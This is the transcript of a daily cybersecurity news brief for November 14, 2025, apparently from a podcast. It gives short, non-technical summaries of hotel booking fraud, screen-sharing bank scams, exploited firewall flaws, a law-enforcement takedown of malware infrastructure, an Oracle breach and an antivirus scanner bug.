BMC Daily Cyber News

This is today’s cyber news for November 14th, 2025. Today’s brief connects travel scams, AI secrets, and live social engineering with active attacks on the edge of the network. You’ll hear how fake hotel booking sites quietly skim payment cards, why leading AI companies are leaking access keys from forgotten GitHub repos, and how WhatsApp screen-sharing scams let fraudsters drain accounts in real time. We also cover critical flaws in popular firewalls and a new Akira ransomware tactic that can take down entire Nutanix clusters. Together, these stories show how everyday tools can quickly become high-impact attack paths.
Listeners get a fast tour of the top ten threats shaping risk right now, from hotel and SMS fraud to cloud code leaks, perimeter device exploitation, and emerging attacks on virtualized data centers and shared hosting. Leaders will understand where to push for better visibility and stronger vendor assurances, defenders will pick up practical signals to hunt for in logs and telemetry, and builders will hear why safer defaults matter in AI and developer tooling. All in one short daily listen, with every headline also available in written form at DailyCyber.news.

What is BMC Daily Cyber News?

The BCM Daily Cyber News brings you clear, timely updates on threats, breaches, patches, and trends every day. Stay informed in minutes with focused audio built for busy professionals. Learn more and explore at BareMetalCyber.com.

Attackers are quietly draining accounts through simple hotel booking tricks. In a year long campaign, a Russian speaking group set up more than four thousand fake hotel and travel websites worldwide. These spoofed sites mirror familiar brands and are linked from phishing emails that mimic real booking confirmations and payment reminders. That means travelers and employees using corporate cards can hand criminals full card numbers, security codes, and contact details without realizing it. For now, the campaign continues, so banks, hotels, and security teams must watch for new domains and suspicious travel charges.

Fraudsters are quietly draining accounts through simple phone calls. In these scams, callers pretend to be bank or service staff, then walk victims through installing screen sharing tools on their phones. Once they can see the screen, the attackers watch one time passcodes arrive and guide victims to approve transfers or new devices. The result is that money moves out of accounts while the victim thinks they are being helped, not robbed. For now, the best defense is tighter education and monitoring, because the tools themselves look like normal support software.

Network edge devices are again under direct fire. United States cyber authorities have warned that a serious bug in WatchGuard Firebox firewalls is being actively exploited against internet facing systems. The flaw lets remote attackers run code on the device without logging in, giving them full control over traffic and configuration. That matters because a compromised firewall can silently reroute data, open back doors, and hide deeper intrusions from basic monitoring. Right now, patches and firmware updates are available, but many organizations still need to find each device and confirm it is clean.

Federal cyber officials are now pushing agencies to fully clean up serious flaws in widely used Cisco firewall platforms. Investigators found that attackers could still take over edge devices even after earlier patches, because one new exploit chain survives reboots and partial upgrades. In practice this means a compromised firewall can be quietly turned into a listening post that reroutes, filters, or clobbers traffic before it reaches internal networks. This matters because those boxes often guard virtual private network access and remote work, so a silent hijack undermines many other controls at once. Right now agencies are being told to upgrade to fixed releases, hunt for signs of tampering, and pull any unfixable devices out of exposure.

Across the criminal ecosystem, a major law enforcement push has just throttled several popular toolkits. Under the banner of Operation Endgame, investigators in Europe and other regions seized more than one thousand servers and at least twenty domains tied to the Rhadamanthys infostealer, the Venom remote access trojan, and the Elysium botnet. That infrastructure had been helping criminals siphon credentials, run remote control sessions, and rent out infected machines to other crews. The outcome is a temporary but meaningful loss of firepower for many phishing and ransomware operations, which matters because it can slow new compromises while defenders strengthen controls. For now, police are processing recovered victim data, notifying organizations, and watching for copycat services that try to fill the gap.

An incident at the Washington Post has turned a spotlight on enterprise resource planning software risk. Attackers exploited an unknown flaw in Oracle business software and pulled personal and financial data for nearly ten thousand current and former staff, including bank details and salary information. The same zero day vulnerability has hit dozens of other organizations that relied on the suite for human resources and payroll without realizing it could be pried open from the outside. This is important because it shows how one weakness in a shared back office platform can expose identities, income data, and payment routes that fuel fraud and extortion. At the moment Oracle has issued patches, investigations continue at affected firms, and victims are being notified while monitoring and access reviews ramp up.

On the hosting side, a bug in the Imunify antivirus scanner has quietly turned a defensive tool into a potential attack path. Researchers showed that crafted files could trick the scanner into running arbitrary commands on Linux servers that host many small and mid sized company websites. Because this software often runs with high privileges on shared machines, one successful exploit can piggyback on the scanner and give attackers control over every site on that node. That matters for businesses who assume their provider’s “secure hosting” label means these lower level tools cannot be turned against them. Right now a fixed version is available, but providers need to roll it out everywhere and check logs for unusual commands and new admin accounts on previously exposed servers.

That’s the BareMetalCyber Daily Brief for November 14th, 2025. For more, visit BareMetalCyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news. We’re back Monday.